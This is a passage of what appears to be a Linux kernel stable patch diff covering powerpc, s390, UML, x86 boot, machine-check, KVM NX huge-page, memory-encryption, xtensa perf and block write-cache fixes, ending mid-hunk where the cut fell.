+ 
+ 	seq_printf(m, "shared_processor_mode=%d\n",
+-		   lppaca_shared_proc(get_lppaca()));
++		   lppaca_shared_proc());
+ 
+ #ifdef CONFIG_PPC_64S_HASH_MMU
+ 	if (!radix_enabled())
+diff --git a/arch/powerpc/platforms/pseries/setup.c b/arch/powerpc/platforms/pseries/setup.c
+index 8ef3270515a9b..a0701dbdb1348 100644
+--- a/arch/powerpc/platforms/pseries/setup.c
++++ b/arch/powerpc/platforms/pseries/setup.c
+@@ -846,7 +846,7 @@ static void __init pSeries_setup_arch(void)
+ 	if (firmware_has_feature(FW_FEATURE_LPAR)) {
+ 		vpa_init(boot_cpuid);
+ 
+-		if (lppaca_shared_proc(get_lppaca())) {
++		if (lppaca_shared_proc()) {
+ 			static_branch_enable(&shared_processor);
+ 			pv_spinlocks_init();
+ #ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
+diff --git a/arch/powerpc/sysdev/mpc5xxx_clocks.c b/arch/powerpc/sysdev/mpc5xxx_clocks.c
+index c5bf7e1b37804..58cee28e23992 100644
+--- a/arch/powerpc/sysdev/mpc5xxx_clocks.c
++++ b/arch/powerpc/sysdev/mpc5xxx_clocks.c
+@@ -25,8 +25,10 @@ unsigned long mpc5xxx_fwnode_get_bus_frequency(struct fwnode_handle *fwnode)
+ 
+ 	fwnode_for_each_parent_node(fwnode, parent) {
+ 		ret = fwnode_property_read_u32(parent, "bus-frequency", &bus_freq);
+-		if (!ret)
++		if (!ret) {
++			fwnode_handle_put(parent);
+ 			return bus_freq;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/arch/powerpc/xmon/xmon.c b/arch/powerpc/xmon/xmon.c
+index bd8e80936f44d..cd692f399cd18 100644
+--- a/arch/powerpc/xmon/xmon.c
++++ b/arch/powerpc/xmon/xmon.c
+@@ -58,6 +58,7 @@
+ #ifdef CONFIG_PPC64
+ #include <asm/hvcall.h>
+ #include <asm/paca.h>
++#include <asm/lppaca.h>
+ #endif
+ 
+ #include "nonstdio.h"
+diff --git a/arch/s390/crypto/paes_s390.c b/arch/s390/crypto/paes_s390.c
+index a279b7d23a5e2..621322eb0e681 100644
+--- a/arch/s390/crypto/paes_s390.c
++++ b/arch/s390/crypto/paes_s390.c
+@@ -35,7 +35,7 @@
+  * and padding is also possible, the limits need to be generous.
+  */
+ #define PAES_MIN_KEYSIZE 16
+-#define PAES_MAX_KEYSIZE 320
++#define PAES_MAX_KEYSIZE MAXEP11AESKEYBLOBSIZE
+ 
+ static u8 *ctrblk;
+ static DEFINE_MUTEX(ctrblk_lock);
+diff --git a/arch/s390/include/uapi/asm/pkey.h b/arch/s390/include/uapi/asm/pkey.h
+index 924b876f992c1..29c6fd369761e 100644
+--- a/arch/s390/include/uapi/asm/pkey.h
++++ b/arch/s390/include/uapi/asm/pkey.h
+@@ -26,7 +26,7 @@
+ #define MAXCLRKEYSIZE	32	   /* a clear key value may be up to 32 bytes */
+ #define MAXAESCIPHERKEYSIZE 136  /* our aes cipher keys have always 136 bytes */
+ #define MINEP11AESKEYBLOBSIZE 256  /* min EP11 AES key blob size  */
+-#define MAXEP11AESKEYBLOBSIZE 320  /* max EP11 AES key blob size */
++#define MAXEP11AESKEYBLOBSIZE 336  /* max EP11 AES key blob size */
+ 
+ /* Minimum size of a key blob */
+ #define MINKEYBLOBSIZE	SECKEYBLOBSIZE
+diff --git a/arch/s390/kernel/ipl.c b/arch/s390/kernel/ipl.c
+index 325cbf69ebbde..df5d2ec737d80 100644
+--- a/arch/s390/kernel/ipl.c
++++ b/arch/s390/kernel/ipl.c
+@@ -503,6 +503,8 @@ static struct attribute_group ipl_ccw_attr_group_lpar = {
+ 
+ static struct attribute *ipl_unknown_attrs[] = {
+ 	&sys_ipl_type_attr.attr,
++	&sys_ipl_secure_attr.attr,
++	&sys_ipl_has_secure_attr.attr,
+ 	NULL,
+ };
+ 
+diff --git a/arch/um/configs/i386_defconfig b/arch/um/configs/i386_defconfig
+index c0162286d68b7..c33a6880a437a 100644
+--- a/arch/um/configs/i386_defconfig
++++ b/arch/um/configs/i386_defconfig
+@@ -35,6 +35,7 @@ CONFIG_TTY_CHAN=y
+ CONFIG_XTERM_CHAN=y
+ CONFIG_CON_CHAN="pts"
+ CONFIG_SSL_CHAN="pts"
++CONFIG_SOUND=m
+ CONFIG_UML_SOUND=m
+ CONFIG_DEVTMPFS=y
+ CONFIG_DEVTMPFS_MOUNT=y
+diff --git a/arch/um/configs/x86_64_defconfig b/arch/um/configs/x86_64_defconfig
+index bec6e5d956873..df29f282b6ac2 100644
+--- a/arch/um/configs/x86_64_defconfig
++++ b/arch/um/configs/x86_64_defconfig
+@@ -33,6 +33,7 @@ CONFIG_TTY_CHAN=y
+ CONFIG_XTERM_CHAN=y
+ CONFIG_CON_CHAN="pts"
+ CONFIG_SSL_CHAN="pts"
++CONFIG_SOUND=m
+ CONFIG_UML_SOUND=m
+ CONFIG_DEVTMPFS=y
+ CONFIG_DEVTMPFS_MOUNT=y
+diff --git a/arch/um/drivers/Kconfig b/arch/um/drivers/Kconfig
+index 5903e2b598aae..fe0210eaf9bb6 100644
+--- a/arch/um/drivers/Kconfig
++++ b/arch/um/drivers/Kconfig
+@@ -111,24 +111,14 @@ config SSL_CHAN
+ 
+ config UML_SOUND
+ 	tristate "Sound support"
++	depends on SOUND
++	select SOUND_OSS_CORE
+ 	help
+ 	  This option enables UML sound support.  If enabled, it will pull in
+-	  soundcore and the UML hostaudio relay, which acts as a intermediary
++	  the UML hostaudio relay, which acts as an intermediary
+ 	  between the host's dsp and mixer devices and the UML sound system.
+ 	  It is safe to say 'Y' here.
+ 
+-config SOUND
+-	tristate
+-	default UML_SOUND
+-
+-config SOUND_OSS_CORE
+-	bool
+-	default UML_SOUND
+-
+-config HOSTAUDIO
+-	tristate
+-	default UML_SOUND
+-
+ endmenu
+ 
+ menu "UML Network Devices"
+diff --git a/arch/um/drivers/Makefile b/arch/um/drivers/Makefile
+index 65b449c992d2c..079556ec044b8 100644
+--- a/arch/um/drivers/Makefile
++++ b/arch/um/drivers/Makefile
+@@ -54,7 +54,7 @@ obj-$(CONFIG_UML_NET) += net.o
+ obj-$(CONFIG_MCONSOLE) += mconsole.o
+ obj-$(CONFIG_MMAPPER) += mmapper_kern.o 
+ obj-$(CONFIG_BLK_DEV_UBD) += ubd.o 
+-obj-$(CONFIG_HOSTAUDIO) += hostaudio.o
++obj-$(CONFIG_UML_SOUND) += hostaudio.o
+ obj-$(CONFIG_NULL_CHAN) += null.o 
+ obj-$(CONFIG_PORT_CHAN) += port.o
+ obj-$(CONFIG_PTY_CHAN) += pty.o
+diff --git a/arch/x86/boot/compressed/head_64.S b/arch/x86/boot/compressed/head_64.S
+index d33f060900d23..b4bd6df29116f 100644
+--- a/arch/x86/boot/compressed/head_64.S
++++ b/arch/x86/boot/compressed/head_64.S
+@@ -485,11 +485,25 @@ SYM_CODE_START(startup_64)
+ 	/* Save the trampoline address in RCX */
+ 	movq	%rax, %rcx
+ 
++	/* Set up 32-bit addressable stack */
++	leaq	TRAMPOLINE_32BIT_STACK_END(%rcx), %rsp
++
++	/*
++	 * Preserve live 64-bit registers on the stack: this is necessary
++	 * because the architecture does not guarantee that GPRs will retain
++	 * their full 64-bit values across a 32-bit mode switch.
++	 */
++	pushq	%rbp
++	pushq	%rbx
++	pushq	%rsi
++
+ 	/*
+-	 * Load the address of trampoline_return() into RDI.
+-	 * It will be used by the trampoline to return to the main code.
++	 * Push the 64-bit address of trampoline_return() onto the new stack.
++	 * It will be used by the trampoline to return to the main code. Due to
++	 * the 32-bit mode switch, it cannot be kept in a register either.
+ 	 */
+ 	leaq	trampoline_return(%rip), %rdi
++	pushq	%rdi
+ 
+ 	/* Switch to compatibility mode (CS.L = 0 CS.D = 1) via far return */
+ 	pushq	$__KERNEL32_CS
+@@ -497,6 +511,11 @@ SYM_CODE_START(startup_64)
+ 	pushq	%rax
+ 	lretq
+ trampoline_return:
++	/* Restore live 64-bit registers */
++	popq	%rsi
++	popq	%rbx
++	popq	%rbp
++
+ 	/* Restore the stack, the 32-bit trampoline uses its own stack */
+ 	leaq	rva(boot_stack_end)(%rbx), %rsp
+ 
+@@ -606,7 +625,7 @@ SYM_FUNC_END(.Lrelocated)
+ /*
+  * This is the 32-bit trampoline that will be copied over to low memory.
+  *
+- * RDI contains the return address (might be above 4G).
++ * Return address is at the top of the stack (might be above 4G).
+  * ECX contains the base address of the trampoline memory.
+  * Non zero RDX means trampoline needs to enable 5-level paging.
+  */
+@@ -616,9 +635,6 @@ SYM_CODE_START(trampoline_32bit_src)
+ 	movl	%eax, %ds
+ 	movl	%eax, %ss
+ 
+-	/* Set up new stack */
+-	leal	TRAMPOLINE_32BIT_STACK_END(%ecx), %esp
+-
+ 	/* Disable paging */
+ 	movl	%cr0, %eax
+ 	btrl	$X86_CR0_PG_BIT, %eax
+@@ -695,7 +711,7 @@ SYM_CODE_END(trampoline_32bit_src)
+ 	.code64
+ SYM_FUNC_START_LOCAL_NOALIGN(.Lpaging_enabled)
+ 	/* Return from the trampoline */
+-	jmp	*%rdi
++	retq
+ SYM_FUNC_END(.Lpaging_enabled)
+ 
+ 	/*
+diff --git a/arch/x86/events/intel/uncore_snbep.c b/arch/x86/events/intel/uncore_snbep.c
+index 935081ddf60bc..9b5859812f4fb 100644
+--- a/arch/x86/events/intel/uncore_snbep.c
++++ b/arch/x86/events/intel/uncore_snbep.c
+@@ -6078,8 +6078,18 @@ void spr_uncore_cpu_init(void)
+ 
+ 	type = uncore_find_type_by_id(uncore_msr_uncores, UNCORE_SPR_CHA);
+ 	if (type) {
++		/*
++		 * The value from the discovery table (stored in the type->num_boxes
++		 * of UNCORE_SPR_CHA) is incorrect on some SPR variants because of a
++		 * firmware bug. Use the value from SPR_MSR_UNC_CBO_CONFIG to replace it.
++		 */
+ 		rdmsrl(SPR_MSR_UNC_CBO_CONFIG, num_cbo);
+-		type->num_boxes = num_cbo;
++		/*
++		 * The MSR doesn't work on the EMR XCC, but the firmware bug doesn't impact
++		 * the EMR XCC. Don't let the value from the MSR replace the existing value.
++		 */
++		if (num_cbo)
++			type->num_boxes = num_cbo;
+ 	}
+ 	spr_uncore_iio_free_running.num_boxes = uncore_type_max_boxes(uncore_msr_uncores, UNCORE_SPR_IIO);
+ }
+diff --git a/arch/x86/include/asm/mem_encrypt.h b/arch/x86/include/asm/mem_encrypt.h
+index 8f513372cd8d4..c91326593e741 100644
+--- a/arch/x86/include/asm/mem_encrypt.h
++++ b/arch/x86/include/asm/mem_encrypt.h
+@@ -50,8 +50,8 @@ void __init sme_enable(struct boot_params *bp);
+ 
+ int __init early_set_memory_decrypted(unsigned long vaddr, unsigned long size);
+ int __init early_set_memory_encrypted(unsigned long vaddr, unsigned long size);
+-void __init early_set_mem_enc_dec_hypercall(unsigned long vaddr, int npages,
+-					    bool enc);
++void __init early_set_mem_enc_dec_hypercall(unsigned long vaddr,
++					    unsigned long size, bool enc);
+ 
+ void __init mem_encrypt_free_decrypted_mem(void);
+ 
+@@ -84,7 +84,7 @@ early_set_memory_decrypted(unsigned long vaddr, unsigned long size) { return 0;
+ static inline int __init
+ early_set_memory_encrypted(unsigned long vaddr, unsigned long size) { return 0; }
+ static inline void __init
+-early_set_mem_enc_dec_hypercall(unsigned long vaddr, int npages, bool enc) {}
++early_set_mem_enc_dec_hypercall(unsigned long vaddr, unsigned long size, bool enc) {}
+ 
+ static inline void mem_encrypt_free_decrypted_mem(void) { }
+ 
+diff --git a/arch/x86/include/asm/pgtable_types.h b/arch/x86/include/asm/pgtable_types.h
+index aa174fed3a71c..f6116b66f2892 100644
+--- a/arch/x86/include/asm/pgtable_types.h
++++ b/arch/x86/include/asm/pgtable_types.h
+@@ -125,11 +125,12 @@
+  * instance, and is *not* included in this mask since
+  * pte_modify() does modify it.
+  */
+-#define _PAGE_CHG_MASK	(PTE_PFN_MASK | _PAGE_PCD | _PAGE_PWT |		\
+-			 _PAGE_SPECIAL | _PAGE_ACCESSED | _PAGE_DIRTY |	\
+-			 _PAGE_SOFT_DIRTY | _PAGE_DEVMAP | _PAGE_ENC |  \
+-			 _PAGE_UFFD_WP)
+-#define _HPAGE_CHG_MASK (_PAGE_CHG_MASK | _PAGE_PSE)
++#define _COMMON_PAGE_CHG_MASK	(PTE_PFN_MASK | _PAGE_PCD | _PAGE_PWT |	       \
++				 _PAGE_SPECIAL | _PAGE_ACCESSED | _PAGE_DIRTY |\
++				 _PAGE_SOFT_DIRTY | _PAGE_DEVMAP | _PAGE_ENC | \
++				 _PAGE_UFFD_WP)
++#define _PAGE_CHG_MASK	(_COMMON_PAGE_CHG_MASK | _PAGE_PAT)
++#define _HPAGE_CHG_MASK (_COMMON_PAGE_CHG_MASK | _PAGE_PSE | _PAGE_PAT_LARGE)
+ 
+ /*
+  * The cache modes defined here are used to translate between pure SW usage
+diff --git a/arch/x86/kernel/apm_32.c b/arch/x86/kernel/apm_32.c
+index 60e330cdbd175..6e38188633a4d 100644
+--- a/arch/x86/kernel/apm_32.c
++++ b/arch/x86/kernel/apm_32.c
+@@ -238,12 +238,6 @@
+ extern int (*console_blank_hook)(int);
+ #endif
+ 
+-/*
+- * The apm_bios device is one of the misc char devices.
+- * This is its minor number.
+- */
+-#define	APM_MINOR_DEV	134
+-
+ /*
+  * Various options can be changed at boot time as follows:
+  * (We allow underscores for compatibility with the modules code)
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index d38ae25e7c01f..b723368dbc644 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1259,11 +1259,11 @@ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(BROADWELL_G,	X86_STEPPING_ANY,		SRBDS),
+ 	VULNBL_INTEL_STEPPINGS(BROADWELL_X,	X86_STEPPING_ANY,		MMIO),
+ 	VULNBL_INTEL_STEPPINGS(BROADWELL,	X86_STEPPING_ANY,		SRBDS),
+-	VULNBL_INTEL_STEPPINGS(SKYLAKE_L,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
+ 	VULNBL_INTEL_STEPPINGS(SKYLAKE_X,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS),
+-	VULNBL_INTEL_STEPPINGS(SKYLAKE,		X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(KABYLAKE_L,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED | GDS),
+-	VULNBL_INTEL_STEPPINGS(KABYLAKE,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED | GDS),
++	VULNBL_INTEL_STEPPINGS(SKYLAKE_L,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS | SRBDS),
++	VULNBL_INTEL_STEPPINGS(SKYLAKE,		X86_STEPPING_ANY,		MMIO | RETBLEED | GDS | SRBDS),
++	VULNBL_INTEL_STEPPINGS(KABYLAKE_L,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS | SRBDS),
++	VULNBL_INTEL_STEPPINGS(KABYLAKE,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS | SRBDS),
+ 	VULNBL_INTEL_STEPPINGS(CANNONLAKE_L,	X86_STEPPING_ANY,		RETBLEED),
+ 	VULNBL_INTEL_STEPPINGS(ICELAKE_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED | GDS),
+ 	VULNBL_INTEL_STEPPINGS(ICELAKE_D,	X86_STEPPING_ANY,		MMIO | GDS),
+diff --git a/arch/x86/kernel/cpu/mce/core.c b/arch/x86/kernel/cpu/mce/core.c
+index e228d58ee2645..f1a748da5fabb 100644
+--- a/arch/x86/kernel/cpu/mce/core.c
++++ b/arch/x86/kernel/cpu/mce/core.c
+@@ -856,6 +856,26 @@ static noinstr bool quirk_skylake_repmov(void)
+ 	return false;
+ }
+ 
++/*
++ * Some Zen-based Instruction Fetch Units set EIPV=RIPV=0 on poison consumption
++ * errors. This means mce_gather_info() will not save the "ip" and "cs" registers.
++ *
++ * However, the context is still valid, so save the "cs" register for later use.
++ *
++ * The "ip" register is truly unknown, so don't save it or fixup EIPV/RIPV.
++ *
++ * The Instruction Fetch Unit is at MCA bank 1 for all affected systems.
++ */
++static __always_inline void quirk_zen_ifu(int bank, struct mce *m, struct pt_regs *regs)
++{
++	if (bank != 1)
++		return;
++	if (!(m->status & MCI_STATUS_POISON))
++		return;
++
++	m->cs = regs->cs;
++}
++
+ /*
+  * Do a quick check if any of the events requires a panic.
+  * This decides if we keep the events around or clear them.
+@@ -875,6 +895,9 @@ static __always_inline int mce_no_way_out(struct mce *m, char **msg, unsigned lo
+ 		if (mce_flags.snb_ifu_quirk)
+ 			quirk_sandybridge_ifu(i, m, regs);
+ 
++		if (mce_flags.zen_ifu_quirk)
++			quirk_zen_ifu(i, m, regs);
++
+ 		m->bank = i;
+ 		if (mce_severity(m, regs, &tmp, true) >= MCE_PANIC_SEVERITY) {
+ 			mce_read_aux(m, i);
+@@ -1852,6 +1875,9 @@ static int __mcheck_cpu_apply_quirks(struct cpuinfo_x86 *c)
+ 		if (c->x86 == 0x15 && c->x86_model <= 0xf)
+ 			mce_flags.overflow_recov = 1;
+ 
++		if (c->x86 >= 0x17 && c->x86 <= 0x1A)
++			mce_flags.zen_ifu_quirk = 1;
++
+ 	}
+ 
+ 	if (c->x86_vendor == X86_VENDOR_INTEL) {
+diff --git a/arch/x86/kernel/cpu/mce/internal.h b/arch/x86/kernel/cpu/mce/internal.h
+index 7e03f5b7f6bd7..0bed57ac86c51 100644
+--- a/arch/x86/kernel/cpu/mce/internal.h
++++ b/arch/x86/kernel/cpu/mce/internal.h
+@@ -157,6 +157,9 @@ struct mce_vendor_flags {
+ 	 */
+ 	smca			: 1,
+ 
++	/* Zen IFU quirk */
++	zen_ifu_quirk		: 1,
++
+ 	/* AMD-style error thresholding banks present. */
+ 	amd_threshold		: 1,
+ 
+@@ -172,7 +175,7 @@ struct mce_vendor_flags {
+ 	/* Skylake, Cascade Lake, Cooper Lake REP;MOVS* quirk */
+ 	skx_repmov_quirk	: 1,
+ 
+-	__reserved_0		: 56;
++	__reserved_0		: 55;
+ };
+ 
+ extern struct mce_vendor_flags mce_flags;
+diff --git a/arch/x86/kernel/cpu/sgx/virt.c b/arch/x86/kernel/cpu/sgx/virt.c
+index 6a77a14eee38c..f5549704ac4cb 100644
+--- a/arch/x86/kernel/cpu/sgx/virt.c
++++ b/arch/x86/kernel/cpu/sgx/virt.c
+@@ -204,6 +204,7 @@ static int sgx_vepc_release(struct inode *inode, struct file *file)
+ 			continue;
+ 
+ 		xa_erase(&vepc->page_array, index);
++		cond_resched();
+ 	}
+ 
+ 	/*
+@@ -222,6 +223,7 @@ static int sgx_vepc_release(struct inode *inode, struct file *file)
+ 			list_add_tail(&epc_page->list, &secs_pages);
+ 
+ 		xa_erase(&vepc->page_array, index);
++		cond_resched();
+ 	}
+ 
+ 	/*
+@@ -243,6 +245,7 @@ static int sgx_vepc_release(struct inode *inode, struct file *file)
+ 
+ 		if (sgx_vepc_free_page(epc_page))
+ 			list_add_tail(&epc_page->list, &secs_pages);
++		cond_resched();
+ 	}
+ 
+ 	if (!list_empty(&secs_pages))
+diff --git a/arch/x86/kernel/kvm.c b/arch/x86/kernel/kvm.c
+index d4e48b4a438b2..796e2f9e87619 100644
+--- a/arch/x86/kernel/kvm.c
++++ b/arch/x86/kernel/kvm.c
+@@ -972,10 +972,8 @@ static void __init kvm_init_platform(void)
+ 		 * Ensure that _bss_decrypted section is marked as decrypted in the
+ 		 * shared pages list.
+ 		 */
+-		nr_pages = DIV_ROUND_UP(__end_bss_decrypted - __start_bss_decrypted,
+-					PAGE_SIZE);
+ 		early_set_mem_enc_dec_hypercall((unsigned long)__start_bss_decrypted,
+-						nr_pages, 0);
++						__end_bss_decrypted - __start_bss_decrypted, 0);
+ 
+ 		/*
+ 		 * If not booted using EFI, enable Live migration support.
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index beca03556379d..7a6df4b62c1bd 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -42,6 +42,7 @@
+ #include <linux/uaccess.h>
+ #include <linux/hash.h>
+ #include <linux/kern_levels.h>
++#include <linux/kstrtox.h>
+ #include <linux/kthread.h>
+ 
+ #include <asm/page.h>
+@@ -55,6 +56,8 @@
+ 
+ extern bool itlb_multihit_kvm_mitigation;
+ 
++static bool nx_hugepage_mitigation_hard_disabled;
++
+ int __read_mostly nx_huge_pages = -1;
+ static uint __read_mostly nx_huge_pages_recovery_period_ms;
+ #ifdef CONFIG_PREEMPT_RT
+@@ -64,12 +67,13 @@ static uint __read_mostly nx_huge_pages_recovery_ratio = 0;
+ static uint __read_mostly nx_huge_pages_recovery_ratio = 60;
+ #endif
+ 
++static int get_nx_huge_pages(char *buffer, const struct kernel_param *kp);
+ static int set_nx_huge_pages(const char *val, const struct kernel_param *kp);
+ static int set_nx_huge_pages_recovery_param(const char *val, const struct kernel_param *kp);
+ 
+ static const struct kernel_param_ops nx_huge_pages_ops = {
+ 	.set = set_nx_huge_pages,
+-	.get = param_get_bool,
++	.get = get_nx_huge_pages,
+ };
+ 
+ static const struct kernel_param_ops nx_huge_pages_recovery_param_ops = {
+@@ -6644,6 +6648,14 @@ static void mmu_destroy_caches(void)
+ 	kmem_cache_destroy(mmu_page_header_cache);
+ }
+ 
++static int get_nx_huge_pages(char *buffer, const struct kernel_param *kp)
++{
++	if (nx_hugepage_mitigation_hard_disabled)
++		return sprintf(buffer, "never\n");
++
++	return param_get_bool(buffer, kp);
++}
++
+ static bool get_nx_auto_mode(void)
+ {
+ 	/* Return true when CPU has the bug, and mitigations are ON */
+@@ -6660,15 +6672,29 @@ static int set_nx_huge_pages(const char *val, const struct kernel_param *kp)
+ 	bool old_val = nx_huge_pages;
+ 	bool new_val;
+ 
++	if (nx_hugepage_mitigation_hard_disabled)
++		return -EPERM;
++
+ 	/* In "auto" mode deploy workaround only if CPU has the bug. */
+-	if (sysfs_streq(val, "off"))
++	if (sysfs_streq(val, "off")) {
+ 		new_val = 0;
+-	else if (sysfs_streq(val, "force"))
++	} else if (sysfs_streq(val, "force")) {
+ 		new_val = 1;
+-	else if (sysfs_streq(val, "auto"))
++	} else if (sysfs_streq(val, "auto")) {
+ 		new_val = get_nx_auto_mode();
+-	else if (strtobool(val, &new_val) < 0)
++	} else if (sysfs_streq(val, "never")) {
++		new_val = 0;
++
++		mutex_lock(&kvm_lock);
++		if (!list_empty(&vm_list)) {
++			mutex_unlock(&kvm_lock);
++			return -EBUSY;
++		}
++		nx_hugepage_mitigation_hard_disabled = true;
++		mutex_unlock(&kvm_lock);
++	} else if (kstrtobool(val, &new_val) < 0) {
+ 		return -EINVAL;
++	}
+ 
+ 	__set_nx_huge_pages(new_val);
+ 
+@@ -6799,6 +6825,9 @@ static int set_nx_huge_pages_recovery_param(const char *val, const struct kernel
+ 	uint old_period, new_period;
+ 	int err;
+ 
++	if (nx_hugepage_mitigation_hard_disabled)
++		return -EPERM;
++
+ 	was_recovery_enabled = calc_nx_huge_pages_recovery_period(&old_period);
+ 
+ 	err = param_set_uint(val, kp);
+@@ -6922,6 +6951,9 @@ int kvm_mmu_post_init_vm(struct kvm *kvm)
+ {
+ 	int err;
+ 
++	if (nx_hugepage_mitigation_hard_disabled)
++		return 0;
++
+ 	err = kvm_vm_create_worker_thread(kvm, kvm_nx_lpage_recovery_worker, 0,
+ 					  "kvm-nx-lpage-recovery",
+ 					  &kvm->arch.nx_lpage_recovery_thread);
+diff --git a/arch/x86/mm/mem_encrypt_amd.c b/arch/x86/mm/mem_encrypt_amd.c
+index ff6c0462beee7..3ea0f763540a4 100644
+--- a/arch/x86/mm/mem_encrypt_amd.c
++++ b/arch/x86/mm/mem_encrypt_amd.c
+@@ -288,11 +288,10 @@ static bool amd_enc_cache_flush_required(void)
+ 	return !cpu_feature_enabled(X86_FEATURE_SME_COHERENT);
+ }
+ 
+-static void enc_dec_hypercall(unsigned long vaddr, int npages, bool enc)
++static void enc_dec_hypercall(unsigned long vaddr, unsigned long size, bool enc)
+ {
+ #ifdef CONFIG_PARAVIRT
+-	unsigned long sz = npages << PAGE_SHIFT;
+-	unsigned long vaddr_end = vaddr + sz;
++	unsigned long vaddr_end = vaddr + size;
+ 
+ 	while (vaddr < vaddr_end) {
+ 		int psize, pmask, level;
+@@ -342,7 +341,7 @@ static bool amd_enc_status_change_finish(unsigned long vaddr, int npages, bool e
+ 		snp_set_memory_private(vaddr, npages);
+ 
+ 	if (!cc_platform_has(CC_ATTR_HOST_MEM_ENCRYPT))
+-		enc_dec_hypercall(vaddr, npages, enc);
++		enc_dec_hypercall(vaddr, npages << PAGE_SHIFT, enc);
+ 
+ 	return true;
+ }
+@@ -466,7 +465,7 @@ static int __init early_set_memory_enc_dec(unsigned long vaddr,
+ 
+ 	ret = 0;
+ 
+-	early_set_mem_enc_dec_hypercall(start, PAGE_ALIGN(size) >> PAGE_SHIFT, enc);
++	early_set_mem_enc_dec_hypercall(start, size, enc);
+ out:
+ 	__flush_tlb_all();
+ 	return ret;
+@@ -482,9 +481,9 @@ int __init early_set_memory_encrypted(unsigned long vaddr, unsigned long size)
+ 	return early_set_memory_enc_dec(vaddr, size, true);
+ }
+ 
+-void __init early_set_mem_enc_dec_hypercall(unsigned long vaddr, int npages, bool enc)
++void __init early_set_mem_enc_dec_hypercall(unsigned long vaddr, unsigned long size, bool enc)
+ {
+-	enc_dec_hypercall(vaddr, npages, enc);
++	enc_dec_hypercall(vaddr, size, enc);
+ }
+ 
+ void __init sme_early_init(void)
+diff --git a/arch/xtensa/include/asm/core.h b/arch/xtensa/include/asm/core.h
+index f856d2bcb9f36..7cef85ad9741a 100644
+--- a/arch/xtensa/include/asm/core.h
++++ b/arch/xtensa/include/asm/core.h
+@@ -44,4 +44,13 @@
+ #define XTENSA_STACK_ALIGNMENT	16
+ #endif
+ 
++#ifndef XCHAL_HW_MIN_VERSION
++#if defined(XCHAL_HW_MIN_VERSION_MAJOR) && defined(XCHAL_HW_MIN_VERSION_MINOR)
++#define XCHAL_HW_MIN_VERSION (XCHAL_HW_MIN_VERSION_MAJOR * 100 + \
++			      XCHAL_HW_MIN_VERSION_MINOR)
++#else
++#define XCHAL_HW_MIN_VERSION 0
++#endif
++#endif
++
+ #endif
+diff --git a/arch/xtensa/kernel/perf_event.c b/arch/xtensa/kernel/perf_event.c
+index a0d05c8598d0f..183618090d05b 100644
+--- a/arch/xtensa/kernel/perf_event.c
++++ b/arch/xtensa/kernel/perf_event.c
+@@ -13,17 +13,26 @@
+ #include <linux/perf_event.h>
+ #include <linux/platform_device.h>
+ 
++#include <asm/core.h>
+ #include <asm/processor.h>
+ #include <asm/stacktrace.h>
+ 
++#define XTENSA_HWVERSION_RG_2015_0	260000
++
++#if XCHAL_HW_MIN_VERSION >= XTENSA_HWVERSION_RG_2015_0
++#define XTENSA_PMU_ERI_BASE		0x00101000
++#else
++#define XTENSA_PMU_ERI_BASE		0x00001000
++#endif
++
+ /* Global control/status for all perf counters */
+-#define XTENSA_PMU_PMG			0x1000
++#define XTENSA_PMU_PMG			XTENSA_PMU_ERI_BASE
+ /* Perf counter values */
+-#define XTENSA_PMU_PM(i)		(0x1080 + (i) * 4)
++#define XTENSA_PMU_PM(i)		(XTENSA_PMU_ERI_BASE + 0x80 + (i) * 4)
+ /* Perf counter control registers */
+-#define XTENSA_PMU_PMCTRL(i)		(0x1100 + (i) * 4)
++#define XTENSA_PMU_PMCTRL(i)		(XTENSA_PMU_ERI_BASE + 0x100 + (i) * 4)
+ /* Perf counter status registers */
+-#define XTENSA_PMU_PMSTAT(i)		(0x1180 + (i) * 4)
++#define XTENSA_PMU_PMSTAT(i)		(XTENSA_PMU_ERI_BASE + 0x180 + (i) * 4)
+ 
+ #define XTENSA_PMU_PMG_PMEN		0x1
+ 
+diff --git a/block/blk-settings.c b/block/blk-settings.c
+index 291cf9df7fc29..86ff375c00ce4 100644
+--- a/block/blk-settings.c
++++ b/block/blk-settings.c
+@@ -824,10 +824,13 @@ EXPORT_SYMBOL(blk_set_queue_depth);
+  */
+ void blk_queue_write_cache(struct request_queue *q, bool wc, bool fua)
+ {
+-	if (wc)
++	if (wc) {
++		blk_queue_flag_set(QUEUE_FLAG_HW_WC, q);
+ 		blk_queue_flag_set(QUEUE_FLAG_WC, q);
+-	else
++	} else {
++		blk_queue_flag_clear(QUEUE_FLAG_HW_WC, q);
+ 		blk_queue_flag_clear(QUEUE_FLAG_WC, q);
++	}
+ 	if (fua)
+ 		blk_queue_flag_set(QUEUE_FLAG_FUA, q);
+ 	else
+diff --git a/block/blk-sysfs.c b/block/blk-sysfs.c
+index e71b3b43927c0..a582ea0da74f5 100644
+--- a/block/blk-sysfs.c
++++ b/block/blk-sysfs.c
+@@ -528,21 +528,16 @@ static ssize_t queue_wc_show(struct request_queue *q, char *page)
+ static ssize_t queue_wc_store(struct request_queue *q, const char *page,
+ 			      size_t count)
+ {
+-	int set = -1;
+-
+-	if (!strncmp(page, "write back", 10))
+-		set = 1;
+-	else if (!strncmp(page, "write through", 13) ||
+-		 !strncmp(page, "none", 4))
+-		set = 0;
+-
+-	if (set == -1)
+-		return -EINVAL;
+-
+-	if (set)
++	if (!strncmp(page, "write back", 10)) {
++		if (!test_bit(QUEUE_FLAG_HW_WC, &q->queue_flags))
++			return -EINVAL;
+ 		blk_queue_flag_set(QUEUE_FLAG_WC, q);
+-	else
